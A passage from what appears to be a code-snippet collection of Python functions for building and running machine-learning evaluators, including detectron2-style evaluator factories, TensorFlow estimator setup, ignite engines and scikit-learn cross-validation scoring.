ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,\n output_dir=output_folder,\n )\n )\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if evaluator_type == \"coco_panoptic_seg\":\n evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder))\n if evaluator_type == \"cityscapes_instance\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesInstanceEvaluator(dataset_name)\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n elif evaluator_type == \"pascal_voc\":\n return PascalVOCDetectionEvaluator(dataset_name)\n elif evaluator_type == \"lvis\":\n return LVISEvaluator(dataset_name, cfg, True, output_folder)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n elif len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type == \"sem_seg\":\n return SemSegEvaluator(\n dataset_name,\n distributed=True,\n output_dir=output_folder,\n num_classes=4,\n ignore_label=255\n )\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n if len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n if len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cfg: CfgNode) -> EvaluatorBase:\n name = cfg[\"name\"]\n evaluator = simple_build(name, cfg, EVALUATORS)\n return evaluator", "def evaluator(test_config: TestConfig, criterion: nn.Module, model: nn.Module,\n device: torch.device) -> Engine:\n metrics, eval_metric, *_ = test_config\n metrics['loss'] = Loss(criterion,\n output_transform=lambda data: (data[0], data[1]))\n val_evaluator = create_supervised_evaluator(model, metrics, device,\n prepare_batch=prepare_batch)\n return val_evaluator", "def sub_evaluator(self, ast: lark.Tree) -> 'Evaluator':\n return Evaluator(ast, activation=self.activation, functions=self.functions)", "def _create_evaluators(self):\n pass", "def custom_build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):\n dump_train = cfg.GLOBAL.DUMP_TRAIN\n return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)", "def clf_eval():\n y_true = np.random.randint(2, size=10000)\n y_pred = np.clip(np.random.normal(0.25, 0.3, size=y_true.shape) + y_true * 0.5, 0, 1)\n\n model_eval = ClassificationEvaluation(\n y_true=y_true,\n y_pred=y_pred,\n class_names=['a', 'b'],\n model_name='foo',\n )\n return model_eval", "def evaluator(evaluate):\r\n @functools.wraps(evaluate)\r\n def ecspy_evaluator(candidates, args):\r\n fitness = []\r\n for candidate in candidates:\r\n fitness.append(evaluate(candidate, args))\r\n return fitness\r\n ecspy_evaluator.single_evaluation = evaluate\r\n return ecspy_evaluator", "def evaluator(self, candidates, args):\n\t\traise NotImplementedError", "def specific_evaluator(self, evaluator: Path, bundle: Bundle):\n pass", "def evaluator(self, candidates, args):\r\n raise NotImplementedError", "def create_multi_node_evaluator(actual_evaluator, communicator):\n\n actual_evaluator._mn_original_evaluate = actual_evaluator.evaluate\n actual_evaluator._mn_communicator = communicator\n\n def new_evaluate(self):\n local_mean_dict = self._mn_original_evaluate()\n global_mean_dict = {\n name:\n self._mn_communicator.allreduce_obj(\n value) / self._mn_communicator.size\n for name, value in sorted(local_mean_dict.items())\n }\n return global_mean_dict\n\n actual_evaluator.evaluate = six.create_bound_method(\n new_evaluate, actual_evaluator)\n return actual_evaluator", "def eval(self):\n dataset = self.config.dataset\n class_config = dataset.class_config\n # it might make sense to make excluded_groups a field in an EvalConfig\n # in the future\n excluded_groups = ['train_scenes']\n\n scene_id_to_cfg = {s.id: s for s in dataset.all_scenes}\n\n @lru_cache(maxsize=len(dataset.all_scenes))\n def build_scene(scene_id: str) -> Scene:\n cfg = scene_id_to_cfg[scene_id]\n scene = cfg.build(\n class_config, self.tmp_dir, use_transformers=True)\n return scene\n\n # build and run each EvaluatorConfig for each scene group\n for e in self.config.evaluators:\n for group_name, group_ids in dataset.scene_groups.items():\n if group_name in excluded_groups:\n continue\n if len(group_ids) == 0:\n log.info(f'Skipping scene group \"{group_name}\". '\n 'Empty scene group.')\n continue\n group_scenes = (build_scene(id) for id in group_ids)\n evaluator = e.build(\n class_config, scene_group=(group_name, group_scenes))\n\n log.info(f'Running {type(evaluator).__name__} on '\n f'scene group \"{group_name}\"...')\n try:\n evaluator.process(group_scenes, self.tmp_dir)\n except FileNotFoundError:\n log.warn(f'Skipping scene group \"{group_name}\". '\n 'Either labels or predictions are missing for '\n 'some scene.')", "def evaluator(self, evaluator):\n self.__evaluator = evaluator", "def make_eval_step(self):\n def eval_step(model, example):\n with flax.deprecated.nn.stateful() as state:\n logits = model(example, train=False)\n if self.info.supervised_keys[-1] == 'error_type':\n targets = example['error_type'][:, None]\n else:\n targets = example['target_output']\n state = {k: v['tag'] for k, v in state.as_dict().items()}\n return self.compute_metrics(logits, targets, None), logits, state\n\n return eval_step", "def evaluator(self):\n return self.__evaluator", "def define_estimator(mode, features, labels, model_fn, config, params):\r\n\r\n assert mode in _ALLOWED_MODES, (\r\n 'mode should be TRAIN, EVAL or PREDICT from tf.estimator.ModeKeys.')\r\n assert params.name_feature_extractor in {'resnet_v1_50', 'resnet_v1_101'}, (\r\n 'params must have name_feature_extractor attribute in resnet_v1_{50,101}.')\r\n if params.name_feature_extractor == 'resnet_v1_101':\r\n raise NotImplementedError(\r\n 'Use of resnet_v1_101 as base feature extractor is not yet implemented.')\r\n\r\n # unpack features\r\n rawimages = features['rawimages'] if 'rawimages' in features.keys() else None\r\n rawimagespaths = features['rawimagespaths'] if 'rawimagespaths' in features.keys() else None\r\n proimages = features['proimages']\r\n prolabels = labels if labels else None\r\n\r\n ## build a fully convolutional model for semantic segmentation\r\n # predictions refer to the training class ids\r\n # for plotting of results (inference) or assessment, predictions should be transformed\r\n # using `{inference, evaluation}_problem_def`s\r\n _, _, predictions = model_fn(mode, proimages, prolabels, config, params)\r\n\r\n # TODO(panos): assert that proimages and predictions have same spatial size\r\n\r\n if mode == tf.estimator.ModeKeys.TRAIN:\r\n\r\n # global step\r\n global_step = tf.train.get_or_create_global_step()\r\n\r\n # losses\r\n with tf.variable_scope('losses'):\r\n losses = define_losses(mode, predictions, prolabels, config, params)\r\n\r\n # exponential moving averages\r\n # creates variables in checkpoint with name: 'emas/' + <variable_name> +\r\n # {'ExponentialMovingAverage,Momentum}\r\n # ex.: for 'classifier/logits/Conv/biases' it saves also\r\n # 'emas/classifier/logits/Conv/biases/ExponentialMovingAverage'\r\n # and 'emas/classifier/logits/Conv/biases/Momentum'\r\n # create_train_op guarantees to run GraphKeys.UPDATE_OPS collection\r\n # before total_loss in every step, but doesn't give any guarantee\r\n # for running after some other op, and since ema need to be run\r\n # after applying the gradients maybe this code needs checking\r\n if params.ema_decay > 0:\r\n with tf.variable_scope('exponential_moving_averages'):\r\n #for mv in slim.get_model_variables():\r\n # print('slim.model_vars:', mv.op.name)\r\n ema = tf.train.ExponentialMovingAverage(params.ema_decay,\r\n num_updates=global_step,\r\n zero_debias=True)\r\n variables_to_ema = []\r\n for mv in tf.model_variables():\r\n if 'BatchNorm/moving' not in mv.name:\r\n variables_to_ema.append(mv)\r\n print(\r\n f\"\\nFound {len(tf.model_variables())} variables, saving exponential \"\r\n f\"moving averages for {len(variables_to_ema)} of them.\\n\")\r\n maintain_ema_op = ema.apply(var_list=variables_to_ema)\r\n tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, maintain_ema_op)\r\n\r\n # create training operation\r\n with tf.variable_scope('train_ops'):\r\n\r\n # optimizer\r\n optimizer = define_optimizer(global_step, params)\r\n\r\n # training op\r\n train_op = create_train_op(\r\n losses['total'],\r\n optimizer,\r\n global_step=global_step,\r\n # update_ops=tf.get_collection(tf.GraphKeys.UPDATE_OPS),\r\n summarize_gradients=False,\r\n # transform_grads_fn=,\r\n # gradient_multipliers=gradient_multipliers,\r\n check_numerics=False,\r\n )\r\n\r\n # TODO: maybe parameterize it\r\n training_hooks = [\r\n _RunMetadataHook(params.log_dir,\r\n every_n_iter=max(params.num_training_steps//50,\r\n params.save_checkpoints_steps))]\r\n\r\n # next two lines were added for distributed debugging\r\n if params.distribute:\r\n tower_context = tf.contrib.distribute.get_tower_context()\r\n assert tower_context\r\n print(f\"Tower {tower_context.tower_id}: _RunMetadataHook is not supported \"\r\n \"yet for distributed training.\")\r\n training_hooks = []\r\n\r\n replace_initializers(config, params)\r\n\r\n summaries_data = {'features': features,\r\n 'labels': labels,\r\n 'predictions': predictions,\r\n 'losses': losses,\r\n 'learning_rate': optimizer._learning_rate} #pylint: disable=protected-access\r\n\r\n scaffold = _define_scaffold(mode, config, params, summaries_data)\r\n estimator_spec = tf.estimator.EstimatorSpec(mode,\r\n predictions=predictions,\r\n loss=losses['total'],\r\n train_op=train_op,\r\n training_hooks=training_hooks,\r\n scaffold=scaffold)\r\n\r\n if mode == tf.estimator.ModeKeys.EVAL:\r\n with tf.variable_scope('losses'):\r\n losses = define_losses(mode, predictions, prolabels, config, params)\r\n\r\n # returns (variable, update_op)\r\n # TF internal error/problem: _streaming_confusion_matrix internally casts\r\n # labels and predictions to int64, and since we feed a dictionary, tensors are\r\n # passed by reference leading them to change type, thus we send an identity\r\n # confusion_matrix = metrics_impl._streaming_confusion_matrix( # pylint: disable=protected-access\r\n # tf.identity(prolabels),\r\n # tf.identity(predictions['decisions']),\r\n # params.output_Nclasses)\r\n # l1_probs, decs = itemgetter('l1_probabilities', 'decisions')(predictions)\r\n # create a new dict with the supported keys only\r\n predictions = _map_predictions_to_new_cids(predictions, params.training_cids2evaluation_cids)\r\n if params.replace_voids:\r\n predictions = _replace_voids(predictions, params)\r\n # TODO(panos): confusion matrix expects prolabels and predictions to have the same shape\r\n # this may not the case when preserve_aspect_ratio is set and this will give an error\r\n if hasattr(params, 'preserve_aspect_ratio'):\r\n if params.preserve_aspect_ratio:\r\n raise NotImplementedError('evaluation with preserving aspect ratio is not implemented.')\r\n predictions = _resize_predictions(predictions, tf.shape(labels['prolabels'])[1:3], params)\r\n tcids2ecids = _replacevoids(params.training_cids2evaluation_cids)\r\n confusion_matrix = metrics_impl._streaming_confusion_matrix( # pylint: disable=protected-access\r\n labels['prolabels'],\r\n predictions['decisions'],\r\n # +1 due to convention of starting counting at 0\r\n max(tcids2ecids) + 1)\r\n\r\n # dict of metrics keyed by name with values tuples of (metric_tensor, update_op)\r\n # TODO: add more semantic segmentation metrics\r\n eval_metric_ops = {'confusion_matrix': (\r\n tf.to_int32(confusion_matrix[0]), confusion_matrix[1])}\r\n\r\n scaffold = _define_scaffold(mode, config, params)\r\n estimator_spec = tf.estimator.EstimatorSpec(\r\n mode,\r\n predictions=predictions,\r\n loss=losses['total'],\r\n eval_metric_ops=eval_metric_ops,\r\n scaffold=scaffold)\r\n\r\n if mode == tf.estimator.ModeKeys.PREDICT:\r\n # create a new dict with the supported keys only\r\n l1_probs, l2_vehicle_probs, l2_human_probs, decs = itemgetter(\r\n 'l1_probabilities', 'l2_vehicle_probabilities', 'l2_human_probabilities', 'decisions')(\r\n predictions)\r\n predictions = {'l1_probabilities': l1_probs,\r\n 'l2_vehicle_probabilities': l2_vehicle_probs,\r\n 'l2_human_probabilities': l2_human_probs,\r\n 'decisions': decs}\r\n # workaround for connecting input pipeline outputs to system output\r\n # TODO(panos): maybe from a system perspective makes more sense to have mapping and\r\n # resizing in the system_factory\r\n # since these are functions of the system and not the network/estimator\r\n # new size defaults to provided values\r\n # if at least one is None then new size is the arbitrary size of rawimage in each step\r\n new_size = (params.height_system, params.width_system)\r\n is_arbitrary = not all(new_size)\r\n if is_arbitrary:\r\n if rawimages is not None:\r\n predictions['rawimages'] = rawimages\r\n if rawimagespaths is not None:\r\n predictions['rawimagespaths'] = rawimagespaths\r\n new_size = tf.shape(predictions['rawimages'])[1:3]\r\n predictions = _resize_predictions(predictions, new_size, params)\r\n tf.logging.warn('Mapping of predictions to new cids is not implemented for now.')\r\n # predictions = _map_predictions_to_new_cids(predictions, params.training_cids2inference_cids)\r\n if params.replace_voids:\r\n predictions = _replace_voids(predictions, params)\r\n\r\n scaffold = _define_scaffold(mode, config, params)\r\n estimator_spec = tf.estimator.EstimatorSpec(\r\n mode,\r\n predictions=predictions,\r\n scaffold=scaffold)\r\n\r\n return estimator_spec", "def __init__(\n self,\n estimator = SGDClassifier(),\n ):\n self.estimator = estimator", "def create_setops_evaluator(\r\n base_model,\r\n classifier,\r\n setops_model,\r\n metrics={},\r\n device=None):\r\n if device:\r\n base_model.to(device)\r\n classifier.to(device)\r\n setops_model.to(device)\r\n\r\n def _inference(engine, batch):\r\n\r\n base_model.eval()\r\n classifier.eval()\r\n setops_model.eval()\r\n\r\n with torch.no_grad():\r\n input_a, input_b, target_a, target_b = _prepare_batch(batch, device=device)\r\n\r\n #\r\n # Apply the classification model\r\n #\r\n embed_a = base_model(input_a)\r\n output_a = classifier(embed_a)\r\n embed_b = base_model(input_b)\r\n output_b = classifier(embed_b)\r\n\r\n #\r\n # Apply the setops model.\r\n #\r\n outputs_setopt = setops_model(embed_a, embed_b)\r\n fake_a, fake_b, a_S_b, b_S_a, a_U_b, b_U_a, a_I_b, b_I_a, \\\r\n a_S_b_b, b_S_a_a, a_I_b_b, b_I_a_a, a_U_b_b, b_U_a_a, \\\r\n a_S_b_I_a, b_S_a_I_b, a_S_a_I_b, b_S_b_I_a = \\\r\n [classifier(o) for o in outputs_setopt]\r\n fake_a_em, fake_b_em = outputs_setopt[:2]\r\n\r\n #\r\n # Calculate the target setops operations\r\n #\r\n target_a_bt = target_a.type(torch.cuda.ByteTensor)\r\n target_b_bt = target_b.type(torch.cuda.ByteTensor)\r\n\r\n target_a_I_b = target_a_bt & target_b_bt\r\n target_a_U_b = target_a_bt | target_b_bt\r\n target_a_S_b = target_a_bt & ~target_a_I_b\r\n target_b_S_a = target_b_bt & ~target_a_I_b\r\n\r\n target_a_I_b = target_a_I_b.type(torch.cuda.FloatTensor)\r\n target_a_U_b = target_a_U_b.type(torch.cuda.FloatTensor)\r\n target_a_S_b = target_a_S_b.type(torch.cuda.FloatTensor)\r\n target_b_S_a = target_b_S_a.type(torch.cuda.FloatTensor)\r\n\r\n return dict(\r\n outputs={\r\n \"real class a\": output_a,\r\n \"real class b\": output_b,\r\n \"fake class a\": fake_a,\r\n \"fake class b\": fake_b,\r\n \"a_S_b class\": a_S_b,\r\n \"b_S_a class\": b_S_a,\r\n \"a_U_b class\": a_U_b,\r\n \"b_U_a class\": b_U_a,\r\n \"a_I_b class\": a_I_b,\r\n \"b_I_a class\": b_I_a,\r\n \"fake embed a\": fake_a_em,\r\n \"fake embed b\": fake_b_em,\r\n },\r\n targets={\r\n \"class a\": target_a,\r\n \"class b\": target_b,\r\n \"a_S_b class\": target_a_S_b,\r\n \"b_S_a class\": target_b_S_a,\r\n \"a_U_b class\": target_a_U_b,\r\n \"a_I_b class\": target_a_I_b,\r\n \"embed a\": embed_a,\r\n \"embed b\": embed_b,\r\n }\r\n )\r\n\r\n engine = Engine(_inference)\r\n\r\n for name, metric in metrics.items():\r\n metric.attach(engine, name)\r\n\r\n return engine", "def evaluator(*args, clusters: bool=True, configuration: Union[AnyStr, List[AnyStr], bool]=\"\",\n enable: bool=True, info: bool=True, name: Union[AnyStr, bool]=\"\", nodeType:\n Union[AnyStr, List[AnyStr], bool]=\"\", nodeTypeChildren: bool=True, priority:\n Union[int, bool]=0, valueName: Union[AnyStr, bool]=\"\", q=True, query=True,\n **kwargs)->Union[List[AnyStr], Any]:\n pass", "def eval(self):\n raise NotImplementedError('Must define eval function to use this base class')", "def runner_decrator(cls):\n\n def custom_build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):\n \"\"\"\n Create evaluator(s) for a given dataset.\n This uses the special metadata \"evaluator_type\" associated with each builtin dataset.\n For your own dataset, you can simply create an evaluator manually in your\n script and do not have to worry about the hacky if-else logic here.\n \"\"\"\n dump_train = cfg.GLOBAL.DUMP_TRAIN\n return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)\n\n def custom_test_with_TTA(cls, cfg, model):\n # In the end of training, run an evaluation with TTA\n # Only support some R-CNN models.\n logger.info(\"Running inference with test-time augmentation ...\")\n model = GeneralizedRCNNWithTTA(cfg, model)\n res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, \"inference_TTA\"))\n res = OrderedDict({k + \"_TTA\": v for k, v in res.items()})\n return res\n\n cls.build_evaluator = classmethod(custom_build_evaluator)\n cls.test_with_TTA = classmethod(custom_test_with_TTA)\n\n return cls", "def evaluator(model, config, test_dir=None):\n shottype = config.shottype\n dataset = config.data_set\n seed = config.seed\n if test_dir is None:\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=None\n )\n if test_dir is not None:\n print(\"Evaluating directory: '{}'.\".format(test_dir))\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=test_dir\n )\n score = model.evaluate_generator(test_data_gen_dir)\n print(\n \"Test metrics: \"\n \"Loss: {:.4f}, \"\n \"Accuracy: {:.4f}, \"\n \"Top 3 accuracy: {:.4f}\".format(score[0], score[1], score[2])\n )\n return score", "def __init__(self):\n self.svclassifier = SVC(kernel='linear')", "def build_evaluation(self, predictions, examples, **kwargs):\n return {}", "def build_and_evaluate(\n X, y, classifier=SGDClassifier,\n verbose=True, ngram_range=(1,1), test_size=0.2, max_features=None\n ):\n\n def build(classifier, X, y=None, ngram_range=(1,1), max_features=None):\n \"\"\"\n Inner build function that builds a single model.\n \"\"\"\n if isinstance(classifier, type):\n classifier = classifier()\n\n model = Pipeline([\n ('vectorizer', TfidfVectorizer(\n ngram_range=ngram_range,\n stop_words='english',\n max_features=max_features\n )),\n ('classifier', classifier),\n ])\n\n model.fit(X, y)\n return model\n\n # Label encode the targets\n labels = LabelEncoder()\n y = labels.fit_transform(y)\n\n # Begin evaluation\n if verbose: print(\"Building for evaluation\")\n X_train, X_test, y_train, y_test = tts(X, y, test_size=test_size)\n \n model = build(classifier, \n X_train, \n y_train, \n ngram_range=ngram_range, \n max_features=max_features\n )\n\n model.labels_ = labels\n\n if verbose: print(\"Classification Report:\\n\")\n\n y_pred = model.predict(X_test)\n print(clsr(y_test, y_pred, target_names=labels.classes_))\n print(confusion_matrix(y_test, y_pred))\n\n return model", "def _run_evaluator(self, func, stats):\n host_stats = stats['host_stats']\n host_caps = stats['host_caps']\n extra_specs = stats['extra_specs']\n share_stats = stats['share_stats']\n\n result = evaluator.evaluate(\n func,\n extra=extra_specs,\n stats=host_stats,\n capabilities=host_caps,\n share=share_stats)\n\n return result", "def getInputSpecification(cls):\n specs = super().getInputSpecification()\n specs.description = r\"\"\"The \\xmlNode{OneVsRestClassifier} (\\textit{One-vs-the-rest (OvR) multiclass strategy})\n Also known as one-vs-all, this strategy consists in fitting one classifier per class. For each\n classifier, the class is fitted against all the other classes. In addition to its computational\n efficiency (only n\\_classes classifiers are needed), one advantage of this approach is its\n interpretability. Since each class is represented by one and one classifier only, it is\n possible to gain knowledge about the class by inspecting its corresponding classifier.\n This is the most commonly used strategy for multiclass classification and is a fair default choice.\n \\zNormalizationNotPerformed{OneVsRestClassifier}\n \"\"\"\n estimatorInput = InputData.assemblyInputFactory(\"estimator\", contentType=InputTypes.StringType,\n descr=r\"\"\"name of a ROM that can be used as an estimator\"\"\", default='no-default')\n #TODO: Add more inputspecs for estimator\n specs.addSub(estimatorInput)\n\n specs.addSub(InputData.parameterInputFactory(\"n_jobs\", contentType=InputTypes.IntegerType,\n descr=r\"\"\"TThe number of jobs to use for the computation: the n\\_classes one-vs-rest\n problems are computed in parallel. None means 1 unless in a joblib.parallel\\_backend\n context. -1 means using all processors.\"\"\", default=None))\n return specs", "def eval(self):\n raise NotImplementedError", "def _prepare_evaluate(self):\n labels = list()\n labels += ['num_procs', 'num_periods', 'is_debug', 'seed_emax', 'seed_sim']\n labels += ['num_draws_emax', 'num_agents_sim', 'num_types', 'edu_spec', 'version']\n labels += ['num_draws_prob', 'seed_prob']\n num_procs, num_periods, is_debug, seed_emax, seed_sim, num_draws_emax, num_agents_sim, \\\n num_types, edu_spec, version, num_draws_prob, seed_prob = \\\n dist_class_attributes(self.respy_base, *labels)\n\n periods_draws_emax = create_draws(num_periods, num_draws_emax, seed_emax, is_debug)\n periods_draws_sims = create_draws(num_periods, num_agents_sim, seed_sim, is_debug)\n\n disturbances = (periods_draws_emax, periods_draws_sims)\n\n # We want to maintain a pure PYTHON version for testing purposes.\n args = list()\n args += [num_periods, num_types, edu_spec['start'], edu_spec['max'], edu_spec['max'] + 1]\n state_space_info = respy_f2py.wrapper_create_state_space(*args)\n if self.mpi_setup == MISSING_INT:\n slavecomm = self.mpi_setup\n else:\n slavecomm = self.mpi_setup.py2f()\n self.set_up_baseline(periods_draws_emax, None)\n\n initial_conditions = get_initial_conditions(self.respy_base)\n\n args = (smm_sample_f2py, state_space_info, initial_conditions, disturbances, slavecomm)\n self.simulate_sample = partial(*args)", "def make_predict_step(self):\n return self.make_eval_step()", "def evaluate_segmentation(self) -> Dict[str, Any]:\n for sample_token in tqdm(self.sample_tokens, disable=not self.verbose):\n sample = self.nusc.get('sample', sample_token)\n # Get the sample data token of the point cloud.\n sd_token = sample['data']['LIDAR_TOP']\n\n # Load the ground truth labels for the point cloud.\n panoptic_label_filename = os.path.join(self.nusc.dataroot, self.nusc.get('panoptic', sd_token)['filename'])\n panoptic_label = load_bin_file(panoptic_label_filename, type='panoptic')\n\n # Filter eval classes.\n label_sem = self.mapper.convert_label(panoptic_label // 1000)\n label_inst = panoptic_label\n panoptic_pred_filename = os.path.join(self.results_folder, 'panoptic', self.eval_set,\n sd_token + '_panoptic.npz')\n panoptic_pred = load_bin_file(panoptic_pred_filename, type='panoptic')\n pred_sem = panoptic_pred // 1000\n pred_inst = panoptic_pred\n\n # Get the confusion matrix between the ground truth and predictions. Update the confusion matrix for the\n # sample data into the confusion matrix for the eval set.\n self.evaluator['segmentation'].addBatch(pred_sem, pred_inst, label_sem, label_inst)\n\n mean_pq, mean_sq, mean_rq, class_all_pq, class_all_sq, class_all_rq = self.evaluator['segmentation'].getPQ()\n mean_iou, class_all_iou = self.evaluator['segmentation'].getSemIoU()\n\n results = self.wrap_result_segmentation(mean_pq, mean_sq, mean_rq, mean_iou, class_all_pq, class_all_sq,\n class_all_rq, class_all_iou)\n return results", "def evaluate_model(testing_images, *model, num_images=None, shuffle=False):\n if num_images is None:\n if hasattr(testing_images, \"__len__\"):\n num_images = len(testing_images)\n else:\n raise ValueError(\"Require num_images with infinite dataset\")\n \n if shuffle:\n testing_images = random_iterator(testing_images)\n imgs = islice(testing_images, num_images)\n\n E = Evaluator()\n logging.info(f\"Running model on {num_images} images\")\n for idx,(gt,dt,shape) in enumerate(detect_on_images(imgs, *model), start=1):\n E.add_ground_truth(idx, gt, shape)\n E.add_detections(idx, dt)\n if idx % 20 == 0:\n logging.info(f\"{idx}\")\n\n if num_images != idx:\n logging.warning(f\"Requested test on {num_images} but only {idx} images were given in dataset.\")\n\n return E", "def make_local_evaluator(self,\n env_creator,\n policy_graph,\n extra_config=None):\n\n return self._make_evaluator(\n CustomEnvPolicyEvaluator,\n env_creator,\n policy_graph,\n 0,\n merge_dicts(\n # important: allow local tf to use more CPUs for optimization\n merge_dicts(\n self.config, {\n \"tf_session_args\": self.\n config[\"local_evaluator_tf_session_args\"]\n }),\n extra_config or {}))", "def predict_and_eval_in_val(self, sess, tst_reader, metrics):\n raise NotImplementedError(\"\"\"please customize predict_and_eval_in_val\"\"\")", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def _generate_evaluaters(self):\n evaluators = []\n for para_key in self.parameter[1]:\n for value in self.parameter[1][para_key]:\n evaluators.append(evaluaterSearch.evaluaterSearch(self.parameter[2], [para_key, value]))\n self.evaluators = evaluators", "def __init__(self, model, masker, partition_tree):\n\n warnings.warn(\"PartitionExplainer is still in an alpha state, so use with caution...\")\n \n # convert dataframes\n if safe_isinstance(masker, \"pandas.core.series.Series\"):\n masker = masker.values\n elif safe_isinstance(masker, \"pandas.core.frame.DataFrame\"):\n masker = masker.values\n\n # If the user just gave a dataset as the masker\n # then we make a masker that perturbs features independently\n self.input_shape = masker.shape[1:] if hasattr(masker, \"shape\") else None\n if type(masker) == np.ndarray:\n self.masker_data = masker\n self.masker = lambda x, mask: x * mask + self.masker_data * np.invert(mask)\n else:\n self.masker = masker\n\n self.model = lambda x: np.array(model(x))\n self.expected_value = None\n self.partition_tree = partition_tree\n \n # handle higher dimensional tensor inputs\n if self.input_shape is not None and len(self.input_shape) > 1:\n self._reshaped_model = lambda x: self.model(x.reshape(x.shape[0], *self.input_shape))\n else:\n self._reshaped_model = self.model\n\n # if we don't have a dynamic clustering algorithm then we can precompute\n # a lot of information\n if not callable(self.partition_tree):\n self.create_cluster_matrices(self.partition_tree)", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def _build(self,\n model_type: str,\n **kwargs) -> Predictor:\n if model_type == 'classifier':\n modelcls = sklearn.gaussian_process.GaussianProcessClassifier\n elif model_type == 'regressor':\n modelcls = sklearn.gaussian_process.GaussianProcessRegressor\n else:\n raise ValueError(\n '`model_type` should be \"classifier\" or \"regressor\"')\n model = modelcls(**kwargs)\n return model", "def evaluate(QualityMeasure,ModelClass,dataset,subgroup,target1,target2): \r\n evaluator = {\r\n QualityMeasure.SCD: evaluate_scd,\r\n }\r\n return evaluator.get(QualityMeasure)(ModelClass,dataset,subgroup,target1,target2)", "def evaluate(self, X, y, hypes={}, n_splits=5, shuffle=True, standardize=True, groups=None):\n \n ### SET HYPERPARAMETERS ###\n model = clone(self.estimator) # Gotta do this otherwise funky things happen\n model.set_params(**hypes)\n \n ### INITIALIZE SCORING DATAFRAME ###\n fractions = ['train', 'val']\n scoring_metrics = ['mae', 'mape', 'medape', 'pearson', 'spearman']\n score_columns = pd.MultiIndex.from_product([fractions, scoring_metrics]) # This sets up a heirarchical index for the results dataframe\n score = pd.DataFrame(columns=score_columns)\n\n ### SET UP X-VALIDATION ###\n \n if groups is not None:\n cv = model_selection.LeaveOneGroupOut()\n splitter = enumerate(cv.split(X,y,groups))\n else:\n cv = model_selection.KFold(n_splits=n_splits, shuffle=shuffle)\n splitter = enumerate(cv.split(X,y))\n\n ### RUN CV AND SCORE MODEL ###\n last_splits = [] # Keep track of split indices for forensics\n for idx, (train, val) in splitter:\n\n X_train = X.iloc[train,:]; y_train = y.iloc[train]\n X_val = X.iloc[val,:]; y_val = y.iloc[val]\n \n if standardize:\n std = preprocessing.StandardScaler()\n std.fit(X_train)\n X_train, X_val = std.transform(X_train), std.transform(X_val)\n\n # if idx==0:\n # for v in ['X_train','y_train','X_val','y_val']:\n # print('{} shape: {}'.format(v, eval('{}.shape'.format(v))))\n\n ### INSTANTIATE AND FIT MODEL ###\n last_splits.append((train, val))\n model.fit(X_train, y_train)\n\n for frac in ['train','val']:\n \n # y_true will either be y_train or y_val depending on what 'frac' is. Kind of hacky.\n y_true = eval('y_'+frac)\n y_pred = model.predict(eval('X_'+frac))\n \n # Calculate MAE\n score.loc[idx, (frac,'mae')] = \\\n metrics.mean_absolute_error(y_true, y_pred)\n \n # Calculate MAPE\n score.loc[idx, (frac,'mape')] = \\\n mean_absolute_percentage_error(y_true, y_pred)\n \n # Calculate MedAPE\n score.loc[idx, (frac,'medape')] = \\\n median_absolute_percentage_error(y_true, y_pred)\n\n # Calculate pearson\n score.loc[idx, 